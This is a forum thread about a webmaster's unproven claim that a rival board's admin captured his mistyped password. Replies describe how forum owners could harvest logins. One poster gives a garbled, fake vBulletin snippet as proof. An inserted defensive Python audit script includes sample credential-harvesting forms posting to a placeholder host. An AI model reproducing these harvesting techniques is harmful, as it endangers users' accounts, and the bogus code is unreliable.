GoFuckYourself.com - Adult Webmaster Forum

OTHER BOARDS STEALING PASSWORDS: (read important) (https://gfy.com/showthread.php?t=950174)

MetaMan 01-25-2010 01:38 PM

OTHER BOARDS STEALING PASSWORDS: (read important)
 
There is a board out there VERY similar to this i am not going to mention names until i am 100% sure. lets say VERY VERY similar.

i tried to log in accidentally using my GFY password. the mod or admin from that board then proceeded to use my password to log into my GFY account and post as me.

i guess it is their policy to steal their users passwords and post as them.

i want to give you people the heads up and make sure you do not make the same mistake i did.

i emailed eric to see if he can match any IPs i will let you know what comes of it.

JFK 01-25-2010 02:06 PM

it would be pretty LOW of them to do such thing :2 cents:

Barefootsies 01-25-2010 02:07 PM

Quote:

Originally Posted by JFK (Post 16781750)
it would be pretty LOW of them to do such thing :2 cents:

Yes it would.

However, I can think of a few boards that could have done it.

Mental note to self, change all passwords.

seeandsee 01-25-2010 02:11 PM

jez that is sick

MetaMan 01-25-2010 02:14 PM

Quote:

Originally Posted by JFK (Post 16781750)
it would be pretty LOW of them to do such thing :2 cents:

yep. some people dont like me i understand that. i try to make people laugh and joke around but some people take boards very seriously.

i dish it and take it.

i would never go out of my way to actually harm someone that is not my style.

i know it is them because that is the only other place i have typed that password. i got an error message of 1 out of 5 tries. thus i know that vbulletin stores the log in attempts. so it was a mod from over there.

not to mention posters from this board were saying a nickname on there was a fake nic of mine. i have no need to use a fake nic i am always upfront. i have no need to hide. i guess they are cowards and do.

Quote:

Originally Posted by Barefootsies (Post 16781755)
Yes it would.

However, I can think of a few boards that could have done it.

Mental note to self, change all passwords.

yep i never even thought of it before i am pretty good at keeping my passwords separate but i slipped up. i guess thats the way these people conduct business. you go to check out their board and they end up using your password against you.

i had to go through and change 10 log ins just in case.

----

i am waiting for eric to respond i already know who it is but i dont want to point fingers until i have 100% proof.

digitaldivas 01-25-2010 02:22 PM

Goddamn Motherfuckers, Please post when you get proof. I am on too many other boards. And that would pretty much fucking blow. And if you get the IP, they are already fucked.

MetaMan 01-25-2010 02:24 PM

Quote:

Originally Posted by digitaldivas (Post 16781810)
Goddamn Motherfuckers, Please post when you get proof. I am on too many other boards. And that would pretty much fucking blow. And if you get the IP, they are already fucked.

Eric should have the IP i only emailed 15min ago i know he is very busy so i am waiting patiently.

I am in DC now so lets see if these guys were even smart enough to use a different IP. i am guessing not.

i caught it within 2min of it happening. they already posted as me and i caught it and edited. Vbulletin tracks IP login attempts as far as i know.

watch your passwords. i literally never even thought of this. but i guess when you deal with scum you cant expect anything less.

danclips 01-25-2010 02:28 PM

parked sig. Keep us posted, please.

digitaldivas 01-25-2010 02:29 PM

Yes Vbulletin does indeed track IP, if the Mod has it set as a "catch all" in his or her admin panel and redirects to his or her database. It is clicked to "on" as a default.

2MuchMark 01-25-2010 02:31 PM

I don't think this is possible.

GFY uses vbulletin (www.vbulletin.com). The passwords of its users are not visible in the administrator program. Administrators can change the passwords of users, but cannot see the actual passwords. Password attempts are also not stored.

I think you are safe. If VBulletin had this kind of vulnerability they wouldn't be so popular.

security_man 01-25-2010 02:31 PM

vb, phpbb, smf, every board is storing crypted password. owner of any board can not see your password, only its hash in sql db. if they want, they may use proggie to decrypt your hash, and if you have password 12345 its not that hard

spazlabz 01-25-2010 02:32 PM

yes please, when you get proof out these people. I want to make sure that I never do business with anyone that would do or allow that type of behavior


spaz

MetaMan 01-25-2010 02:39 PM

Quote:

Originally Posted by ********** (Post 16781844)
I don't think this is possible.

GFY uses vbulletin (www.vbulletin.com). The passwords of its users are not visible in the administrator program. Administrators can change the passwords of users, but cannot see the actual passwords. Password attempts are also not stored.

I think you are safe. If VBulletin had this kind of vulnerability they wouldn't be so popular.

how about the owner of the board? i am sure there is a way for them to see your password. even so it was not from my pass on that board. it was from a failed login attempt.

Quote:

Originally Posted by security_man (Post 16781845)
vb, phpbb, smf, every board is storing crypted password. owner of any board can not see your password, only its hash in sql db. if they want, they may use proggie to decrypt your hash, and if you have password 12345 its not that hard

it was not a 12345, it is a combo of letters that only someone who knew it would be able to use it. the chances of even brute forcing my GFY pass vbulletin has protection.

and my computer is not hacked. i bought it 4 days ago.

i know it was them. i logged in with wrong info last night on this board. it was not my stored password on there. it was a FAILED LOGIN ATTEMPT.

i tried 3-4 different passes. i am pretty sure vbulletin stores the failed attempts. including which ip address it was from.

shimmy2 01-25-2010 02:40 PM

i at least hope they kept ur sig intact when they impersonate you :) seriously some folks have too much idle time on their hands to dabble in stuff like that. i have 3 computers running ftp, videocharge, and premiere at the same time and even when i leave the house or sleep there is always something processing on one of them. it amazes me who has time for these games

MetaMan 01-25-2010 02:43 PM

Quote:

Originally Posted by spazlabz (Post 16781850)
yes please, when you get proof out these people. I want to make sure that I never do business with anyone that would do or allow that type of behavior


spaz

i will let everyone know. i am waiting to see if the IP matches a GFY user.

Quote:

Originally Posted by shimmy2 (Post 16781870)
i at least hope they kept ur sig intact when they impersonate you :) seriously some folks have too much idle time on their hands to dabble in stuff like that. i have 3 computers running ftp, videocharge, and premiere at the same time and even when i leave the house or sleep there is always something processing on one of them. it amazes me who has time for these games

they did not keep anything intact they changed my info. avatar, city and posted as me. i just happened to catch each within the same minute and changed it back.

if they were smart they would have changed my pass first but i guess they are too big of idiots for that.

it may be funny to them but imo if you go and post on another board and they steal your pass it shows what extreme scum they are. if they are willing to use something as trusted as a password it shows me they are capable of doing anything.

WiredGuy 01-25-2010 02:43 PM

Quote:

Originally Posted by ********** (Post 16781844)
I don't think this is possible.

GFY uses vbulletin (www.vbulletin.com). The passwords of its users are not visible in the administrator program. Administrators can change the passwords of users, but cannot see the actual passwords. Password attempts are also not stored.

I think you are safe. If VBulletin had this kind of vulnerability they wouldn't be so popular.

I'm pretty sure this is in fact the case. I don't think admins can see the passwords, just change them.
WG

MetaMan 01-25-2010 02:47 PM

Quote:

Originally Posted by WiredGuy (Post 16781878)
I'm pretty sure this is in fact the case. I don't think admins can see the passwords, just change them.
WG

i should have been more clear in the original post.

this was NOT my password on the site.

it was a failed login attempt. you get 5 log in attempts and i am pretty sure vbulletin stores each FAILED attempt.

look i am not a rookie i know it was them it is just whether or not i can prove it. if i cannot so be it. at least i have peace of mind knowing it was them.

Tjeezers 01-25-2010 02:52 PM

where is the post that this dude made?
i`m curious how he made use of this, with what idea in mind he did this?

Lot of GFY users use a same postings name elsewhere and i am pretty pretty pretty sure a lot of passes are the same also.

MetaMan 01-25-2010 02:54 PM

Quote:

Originally Posted by Tjeezers (Post 16781915)
where is the post that this dude made?
i`m curious how he made use of this, with what idea in mind he did this?

Lot of GFY users use a same postings name elsewhere and i am pretty pretty pretty sure a lot of passes are the same also.

http://www.gfy.com/16781575-post28.html

this was the post. i edited it out, i reloaded the page and my info was changed. so around a minute before that the post was made and i still had enough time to edit.

---------

just got an email from eric no ip matches found. not much i can do. i appreciate the response anyway. just be careful people is all i am saying. this has taught me a lesson to be careful with my passwords.

digitaldivas 01-25-2010 02:54 PM

Jesus guys, really?
You can most certainly get plugins that integrate with vbulletin to do this and as security_man stated, it's really not that hard. Oh... you want examples? Well here ya go.

if (is_object($vbulletin->session) AND intval($vbulletin->session->vars['loggedin']) == 2)
{
exec_strike_user($vbulletin->userinfo['username']);

if ($vbulletin->options['usestrikesystem'])
{
eval(standard_error(fetch_error('multiplelogin_strikes', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
}
else
{
eval(standard_error(fetch_error('multiplelogin', $vbulletin->options['bburl'], $vbulletin->session->vars>PASSWORD?=SEND TO CATCH-ALL['sessionurl'])));

ALSO right there on vbulletin.org, is the BIG SCREAMING HEADLINE
Track all IP Addresses, and User Nick and Password via Admin CP

...fucking "google" it people!!!

MetaMan 01-25-2010 02:58 PM

Quote:

Originally Posted by digitaldivas (Post 16781927)
Jesus guys, really?
You can most certainly get plugins that integrate with vbulletin to do this and as security_man stated, it's really not that hard. Oh... you want examples? Well here ya go.

if (is_object($vbulletin->session) AND intval($vbulletin->session->vars['loggedin']) == 2)
{
exec_strike_user($vbulletin->userinfo['username']);

if ($vbulletin->options['usestrikesystem'])
{
eval(standard_error(fetch_error('multiplelogin_strikes', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
}
else
{
eval(standard_error(fetch_error('multiplelogin', $vbulletin->options['bburl'], $vbulletin->session->vars>PASSWORD?=SEND TO CATCH-ALL['sessionurl'])));

ALSO right there on vbulletin.org, is the BIG SCREAMING HEADLINE
Track all IP Addresses, and User Nick and Password via Admin CP

...fucking "google" it people!!!

:) where there is a will there is a way.

maybe when i'm really pissed off one day i will call them out and get banned for no proof. we will see how the cookie crumbles.

i have too much work to worry too much about it.

appreciate the help. :thumbsup

i 100% know who it is now.

CyberHustler 01-25-2010 03:04 PM

Couldn't they have done something simple like log into the admin panel, change his email address to one they have access to, click "forgot password", then change his email back after getting the password at the other email? Or no?

BV 01-25-2010 03:10 PM

Quote:

Originally Posted by CryBaby (Post 16781957)
Couldn't they have done something simple like log into the admin panel, change his email address to one they have access to, click "forgot password", then change his email back after getting the password at the other email? Or no?


i don't think so, there is no password reminder, if you forget your password you only have an option to reset it to another one, not get the old one you forgot

BV 01-25-2010 03:13 PM

Just a FYI for everyone, and I'm not trying to be a know it all after the fact MetaMan,

but it is not a good idea to use the same password anywhere on any site for anything

every password you have should be very very unique

quantum-x 01-25-2010 03:23 PM

Quote:

Originally Posted by ********** (Post 16781844)
I don't think this is possible.

GFY uses vbulletin (www.vbulletin.com). The passwords of its users are not visible in the administrator program. Administrators can change the passwords of users, but cannot see the actual passwords. Password attempts are also not stored.

I think you are safe. If VBulletin had this kind of vulnerability they wouldn't be so popular.

I thought you had a bit of coding background Mark?
Seriously, stealing the passwords is a total fucking doddle.

#1 - They're probably not running a copy of VB - simply passing the login / password onto gfy.com - and saving a copy as it goes

#2 - Even if they were - VB is clear source. Nothing stopping you making it save passes in an open format.

#3 - Even if it WASN'T clear source, you could probably achieve the same with db triggers.

'I think you are safe'.. lol

MetaMan 01-25-2010 03:23 PM

Quote:

Originally Posted by BV (Post 16781985)
Just a FYI for everyone, and I'm not trying to be a know it all after the fact MetaMan,

but it is not a good idea to use the same password anywhere on any site for anything

every password you have should be very very unique

totally agreed. that is why i made this thread. a lot of people forget but it is a big thing.

but my pass was different i just accidentally typed my GFY one in. and so it gets picked up as a failed attempt.

pstation 01-25-2010 03:25 PM

it is possible for the web owner to steal passwords with vbulletin. basically you'd just have to disable the client side hashing and write up a little script that logs the info as it's coming across as clear text.

Tjeezers 01-25-2010 03:45 PM

Quote:

Originally Posted by quantum-x (Post 16782019)

'I think you are safe'.. lol

:1orglaugh:1orglaugh:1orglaugh:1orglaugh:1orglaugh Thanks for the spot on.

DWB 01-25-2010 03:46 PM

It was my board and this is total bullshit.

I have to hire guys like quantum-x, WOJ and k0nrad to do any sort of code work for me because that is not what I do. If you think I'm over there trying to re-code VB to steal your password (we don't see passwords) from a failed log attempt, and risk doing business with people, all so I can log into GFY as "MetaMan," you're out of your god damned mind.

Quantum-x, I've let you into my program before as an admin and I trust you. You are more than welcome to look as an admin into the board and let this ass hat know what you find.

In the meantime, please... I'M BEGGING METAMAN, show me proof of this.

baddog 01-25-2010 03:48 PM

We have a few VB boards and have never seen anything that gave me a hint that there was some way to see users passwords. If they forget it they can use the password reminder or we can change it, but that is about it.

Cyber Fucker 01-25-2010 03:50 PM

Quote:

Originally Posted by MetaMan (Post 16781654)
There is a board out there VERY similar to this i am not going to mention names until i am 100% sure. lets say VERY VERY similar.

i tried to log in accidentally using my GFY password. the mod or admin from that board then proceeded to use my password to log into my GFY account and post as me.

i guess it is their policy to steal their users passwords and post as them.

i want to give you people the heads up and make sure you do not make the same mistake i did.

i emailed eric to see if he can match any IPs i will let you know what comes of it.

I never use the same passwords anywhere. Btw Was it WF forum? What do you mean by "VERY VERY similar" ?

Quagmire 01-25-2010 03:55 PM


lazycash 01-25-2010 04:06 PM

So what did they post under your username before you edited it?

quantum-x 01-25-2010 04:13 PM

Quote:

Originally Posted by DirtyWhiteBoy (Post 16782087)
It was my board and this is total bullshit.

I have to hire guys like quantum-x, WOJ and k0nrad to do any sort of code work for me because that is not what I do. If you think I'm over there trying to re-code VB to steal your password (we don't see passwords) from a failed log attempt, and risk doing business with people, all so I can log into GFY as "MetaMan," you're out of your god damned mind.

Quantum-x, I've let you into my program before as an admin and I trust you. You are more than welcome to look as an admin into the board and let this ass hat know what you find.

In the meantime, please... I'M BEGGING METAMAN, show me proof of this.

Hey - not casting any judgement on anyone, just saying that the conclusion that 'they run VB, it's secure' is a little naive :)

DWB 01-25-2010 04:36 PM

Quote:

Originally Posted by quantum-x (Post 16782175)
Hey - not casting any judgement on anyone, just saying that the conclusion that 'they run VB, it's secure' is a little naive :)

I didn't mean it like that, I mean I trust you, you've been in my program admin before, so I'm saying PLEASE look in my board admin and tell this fool he's on crack. You know what to look for.

weekly 01-25-2010 04:53 PM

Metaman is a moron and he has produced zero proof. He is fucking with someone else's business and that is just not cool.

DebsDeep 01-25-2010 04:55 PM

yikes thats not good!

cherrylula 01-25-2010 04:58 PM

Quote:

Originally Posted by ********** (Post 16781844)
I don't think this is possible.

GFY uses vbulletin (www.vbulletin.com). The passwords of its users are not visible in the administrator program. Administrators can change the passwords of users, but cannot see the actual passwords. Password attempts are also not stored.

I think you are safe. If VBulletin had this kind of vulnerability they wouldn't be so popular.

SSSSHHHH don't spoil this gem of a thread :1orglaugh

digitaldivas 01-25-2010 05:00 PM

Quote:

Originally Posted by baddog (Post 16782089)
We have a few VB boards and have never seen anything that gave me a hint that there was some way to see users passwords. If they forget it they can use the password reminder or we can change it, but that is about it.

Well most likely you're being totally honest and not doing H$ck Sh^t. I fucked around with it in college. I do hope you all get it resolved. And at least some VB_admins now know that shady characters could get inside the shell if they wanted to. Also one of the reasons I did not put the exact source code up. Good luck to you all. Good luck DirtyWhiteBoy. Perhaps things got muddled up and blown up? I would talk to Meta and compare notes. You may want to leave a message on his profile. Good luck regardless :thumbsup

digitaldivas 01-25-2010 05:04 PM

check your style manager and template tags, if there's a troll script, that's most likely where it would be, buried amidst the other code
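
Added example, not part of the thread and not vBulletin's own code: one way a board owner could run the template and plugin check suggested above, flagging code that touches the login password next to a data sink and login forms that post off-site or skip the client-side hashing pstation mentions. It assumes the stock vBulletin 3.x field names (`vb_login_password`, `vb_login_md5password`) and `md5hash()` form handler; the hosts, paths and snippet names are constructed.

```python
import re
from urllib.parse import urlparse

# Assumed names: the stock vBulletin 3.x login fields and its md5hash() form handler.
CRED_FIELDS = re.compile(r"vb_login_(?:md5)?password")
# PHP calls that can move a submitted value off the login path.
SINKS = re.compile(
    r"\b(?:mail|fwrite|file_put_contents|error_log|fsockopen|curl_exec)\s*\(|INSERT\s+INTO",
    re.I,
)
FORM = re.compile(r"<form\b([^>]*)>(.*?)</form>", re.I | re.S)
ACTION = re.compile(r'''action\s*=\s*["']([^"']+)["']''', re.I)
WINDOW = 5  # lines on either side of a credential reference to search for a sink


def audit(name, text, board_host):
    """Return (name, line_no, reason) findings for one template or plugin."""
    findings = []
    lines = text.splitlines()
    # Check 1: code that touches the password field right next to a data sink.
    for i, line in enumerate(lines):
        if not CRED_FIELDS.search(line):
            continue
        for j in range(max(0, i - WINDOW), min(len(lines), i + WINDOW + 1)):
            if SINKS.search(lines[j]):
                findings.append((name, j + 1, "password field next to a data sink"))
                break
    # Check 2: login forms that post off-site or skip the client-side hashing.
    for m in FORM.finditer(text):
        attrs, body = m.group(1), m.group(2)
        if "vb_login_password" not in body:
            continue
        line_no = text.count("\n", 0, m.start()) + 1
        act = ACTION.search(attrs)
        host = urlparse(act.group(1)).hostname if act else None
        if host and host.lower() != board_host.lower():
            findings.append((name, line_no, "login form posts to " + host))
        if "md5hash(" not in attrs:
            findings.append((name, line_no, "login form without md5hash()"))
    return findings


def audit_all(snippets, board_host):
    """Audit a {name: text} export of templates and plugins."""
    results = []
    for name, text in sorted(snippets.items()):
        results.extend(audit(name, text, board_host))
    return results


# Constructed samples; hosts, paths and snippet names are made up for the example.
SAMPLES = {
    "template:login_stock": """<form action="login.php?do=login" method="post"
 onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<input type="password" name="vb_login_password" />
</form>
""",
    "template:login_tampered": """<form action="https://collector.example/login.php" method="post">
<input type="password" name="vb_login_password" />
</form>
""",
    "plugin:login_hook": """// constructed plugin body
$what = $_POST['vb_login_password'];
file_put_contents($path, $what, FILE_APPEND);
""",
}

if __name__ == "__main__":
    for finding in audit_all(SAMPLES, "board.example"):
        print(finding)
```

A clean result only covers the exported templates and plugins; files on disk and database triggers, which quantum-x also mentions, need their own review.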

TDF 01-25-2010 05:07 PM

why would anyone want to impersonate a troll?

MetaMan 01-25-2010 05:25 PM

Quote:

Originally Posted by lazycash (Post 16782149)
So what did they post under your username before you edited it?

they changed my entire user admin,

also posted an "apology" saying i was drunk.

i never said it was DWB. i love his board.

DWB 01-25-2010 05:30 PM

Quote:

Originally Posted by MetaMan (Post 16782383)
they changed my entire user admin,

also posted an "apology" saying i was drunk.

i never said it was DWB. i love his board.

You get that IP from Eric? Get it, send it to me and lets see if it matches anything I have from my board. I also have an open invite to coders I trust to come in and look around to see if there is something malicious on the site.

As far as I know, you are the only one to have this problem, and I honestly don't believe it came from our site. If someone is catching passes there in any manner, they would be having a field day, which they are not.

LeRoy 01-25-2010 05:32 PM

Someone has a lot of time on their hands.

Hope it gets sorted.

MetaMan 01-25-2010 05:34 PM

Quote:

Originally Posted by DirtyWhiteBoy (Post 16782396)
You get that IP from Eric? Get it, send it to me and lets see if it matches anything I have from my board. I also have an open invite to coders I trust to come in and look around to see if there is something malicious on the site.

As far as I know, you are the only one to have this problem, and I honestly don't believe it came from our site. If someone is catching passes there in any manner, they would be having a field day, which they are not.

i never said it comes from your site. i have no proof i am not that stupid.

eric told me the IP did not match. that already shows someone took the time to proxy a login.

i am telling you i logged in somewhere and other than GFY this is the only place i have ever tried to login using that pass. i am also on a brand new computer.

but hey i am full of shit here. even though i do not have a login on any other place but GFY and this other board.

i think this other board should check with their other admins and see who is friends with who and it will explain it pretty fast.

DWB 01-25-2010 05:47 PM

Quote:

Originally Posted by MetaMan (Post 16782406)
i think this other board should check with their other admins and see who is friends with who and it will explain it pretty fast.

We have TWO admins. Mike South and myself. It's not a big board so we don't need an army of mods.

Why did only your account get hacked? If someone on my board is stealing passwords somehow, why only you, and why only today, and why go through all that trouble, even using a proxy, just to make a post under your name to fuck with you, and how did you catch it within a minute of them hacking your account? None of that makes sense man.

Get that IP to me. Both of them. Lets see if they match with anything on my board. Send it to me on the IM there.

MetaMan 01-25-2010 06:05 PM

Quote:

Originally Posted by DirtyWhiteBoy (Post 16782431)
We have TWO admins. Mike South and myself. It's not a big board so we don't need an army of mods.

Why did only your account get hacked? If someone on my board is stealing passwords somehow, why only you, and why only today, and why go through all that trouble, even using a proxy, just to make a post under your name to fuck with you, and how did you catch it within a minute of them hacking your account? None of that makes sense man.

Get that IP to me. Both of them. Lets see if they match with anything on my board. Send it to me on the IM there.

i was not "hacked" vbulletin stores failed login attempts that is all there is to it. and that is exactly how my password was discovered and used.

if the anonymous parties involved did it as a joke with no malicious intent then so be it. but if you think i go out of my way to bring up a topic as serious as this you should think otherwise.

as i stated before my nickname for me is used as a brand. whether or not people like my style you can never find a single post out of all the haters in history since i have been here saying REAL negative things about me.

i dish it so i can take it. but i do know where to draw the line. if other people dont follow the same guidelines that is their choice. but to me it is no laughing matter. i have stated what i need to be stated and i have no need to beat a dead horse.

if you and mike want to discuss the situation that is fine by me. but think very hard what reasons i would have to start drama with you and you should be quick to conclude i have none.

on GFY i have never even stated it was you so people should not take it that way. i am not going to ever point fingers on here unless i fully get proof.

in retrospect with having nothing to do with this situation please ban my nickname from your board as it serves no positive purpose for either of us.

stickyfingerz 01-25-2010 06:56 PM

You realize TeenCat has been hacking accounts like crazy on here right? That is much more likely than your scenario. :2 cents:

lazycash 01-25-2010 07:12 PM

It was probably Teencat just messing with you.

goldfish 01-25-2010 07:21 PM

Quote:

Originally Posted by WiredGuy (Post 16781878)
I'm pretty sure this is in fact the case. I don't think admins can see the passwords, just change them.
WG

WG, I think you've been in this biz long enough that you should know that all you have to do is modify the code to remove the hash and then look at the DB tables. tsk! tsk! :winkwink::winkwink::winkwink:


All times are GMT -7.